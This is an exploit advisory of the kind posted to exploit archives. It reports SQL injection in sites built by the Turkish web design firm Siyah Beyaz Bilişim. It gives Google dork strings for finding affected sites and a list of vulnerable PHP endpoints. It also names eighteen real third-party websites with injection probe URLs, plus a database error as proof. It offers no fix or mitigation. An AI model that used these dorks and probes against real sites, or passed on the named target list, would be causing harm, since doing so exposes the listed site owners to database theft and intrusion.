#################################################################################################
# Exploit Title : Siyah Beyaz Bilişim Web Design SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 24/11/2018
# Vendor Homepage : siyahbeyazbilisim.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dorks :
intext:''Tasarım ve Kodlama Siyah Beyaz Bilişim tarafından yapılmıştır.''
intext:''Tasarım ve Kodlama SiyahBeyazBilişim tarafından yapılmıştır.''
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# SQL Injection Exploit :
/yazi.php?id=[SQL Injection]
/resimler.php?id=[SQL Injection]
/sayfa.php?id=[SQL Injection]
/grup.php?id=[SQL Injection]
/haber.php?id=[SQL Injection]
/slider.php?id=[SQL Injection]
/sube.php?id=[SQL Injection]
/duyurular.php?id=[SQL Injection]
#################################################################################################
# Example Vulnerable Sites =>
[+] aydincdm.org/yazi.php?id=5%27 => [ Proof of Concept ] => archive.is/cABYo
[+] sevennakliyat.com/resimler.php?id=3%27
[+] tucanteknik.com/sayfa.php?id=110%27
[+] turenyapi.com/grup.php?id=16%27
[+] saranlar.com/sube.php?id=2%27
[+] semirauto.com/grup.php?id=1%27
[+] aydinkompresor.net/kurumsal.php?id=4%27
[+] simgepastacilik.com/grup.php?id=12%27
[+] kocarlitarispamuk.com/grup.php?id=4%27
[+] royalmarine.com.tr/grup.php?id=2%27
[+] didimsanatakademisi.com/album.php?id=12%27
[+] dundarlarparke.com/grup.php?id=6%27
[+] aykimsan.com.tr/grup.php?id=22%27
[+] lilacambalkon.com/resimler.php?id=7%27
[+] avrupakulturakademi.com/sayfa.php?id=1%27
[+] novasluxe.com/sayfa.php?id=21%27
[+] megafit.com.tr/resimler.php?id=3%27
[+] dogrugunespaneli.com/grup.php?id=6%27
#################################################################################################
# Example SQL Database Error :
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/adsyb/public_html/yazi.php on line 5
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################